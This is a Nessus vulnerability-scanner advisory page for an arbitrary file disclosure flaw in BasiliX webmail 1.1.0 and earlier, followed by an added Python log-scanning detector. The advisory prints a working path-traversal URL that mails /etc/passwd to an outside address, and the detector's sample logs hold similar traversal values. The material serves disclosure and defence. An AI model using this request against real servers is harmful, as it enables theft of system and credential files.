Nessus Plugin #14305
Note: This file has been created from a downloaded version of the Nessus Plugins from http://www.nessus.org/. Therefore, the information here can be outdated.
BasiliX Arbitrary File Disclosure Vulnerability
- Family: Remote file access
- Category: infos
- Copyright: This script is Copyright (C) 2004 George A. Theall
- Summary: Checks for Arbitrary File Disclosure Vulnerability in BasiliX
- Version: $Revision: 1.7 $
- Cve_id: -
- Bugtraq_id: 5062
- Xrefs: -
- Description:
The target is running at least one instance of BasiliX whose version
number is 1.1.0 or lower. Such versions allow retrieval of arbitrary
files that are accessible to the web server user when sending a
message since (1) they accept a list of attachment names from the
client and (2) they do not verify that attachments were in fact
uploaded.
For example, assuming you have logged in and accepted the requisite
cookies, opening a URL like the following would likely cause
/etc/passwd to be sent to you@example.com :
http://target/basilix/basilix.php?RequestID=CMPSSEND
&is_js=1.4
&cmps_from=Me
&cmps_to=you@example.com
&cmps_body=Here%20is%20the%20file%20you%20requested.
&cmps_f0=../../../../../etc/passwd
Further, since these versions do not sanitize input to login.php3,
it's possible for an attacker to establish a session on the target
without otherwise having access there by authenticating against an
IMAP server of his or her choosing.
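A detection sketch for the attachment-name issue described above, added here as an example and not part of the Nessus plugin or of BasiliX: it scans web server access logs for CMPSSEND requests whose cmps_fN parameter is not a bare file name. The log lines are constructed samples, and the rule that a legitimate attachment name contains no path separator is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2005:18:40:01 +0200] "GET /basilix/basilix.php'
    '?RequestID=CMPSSEND&is_js=1.4&cmps_to=you@example.com'
    '&cmps_f0=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Apr/2005:18:41:07 +0200] "GET /basilix/basilix.php'
    '?RequestID=CMPSSEND&cmps_to=a@example.com&cmps_f0=report.pdf HTTP/1.1" 200 498',
    '192.0.2.12 - - [27/Apr/2005:18:42:13 +0200] "GET /basilix/basilix.php HTTP/1.1" 200 2048',
    '192.0.2.13 - - [27/Apr/2005:18:43:20 +0200] "GET /basilix/basilix.php'
    '?RequestID=CMPSSEND&cmps_f1=/etc/hosts HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
ATTACH_PARAM_RE = re.compile(r"cmps_f\d+")  # cmps_f0, cmps_f1, ...


def is_suspicious_name(name):
    """Assumption: a legitimate attachment name is a bare file name."""
    normalized = name.replace("\\", "/")
    return "/" in normalized or normalized in (".", "..")


def scan(lines):
    """Return (client_ip, [(param, decoded_value), ...]) per flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qsl percent-decodes values, so %2F and "/" are treated alike.
        params = parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True)
        if ("RequestID", "CMPSSEND") not in params:
            continue
        bad = [(k, v) for k, v in params
               if ATTACH_PARAM_RE.fullmatch(k) and is_suspicious_name(v)]
        if bad:
            findings.append((line.split()[0], bad))
    return findings


if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, params)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers requests that carry the attachment names in the query string.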
***** Nessus has determined the vulnerability exists on the target
***** simply by looking at the version number(s) of BasiliX
***** installed there.
Solution : Upgrade to BasiliX version 1.1.1 or later.
Risk factor : Medium
Generated on 27.04.2005 at 18:49:54.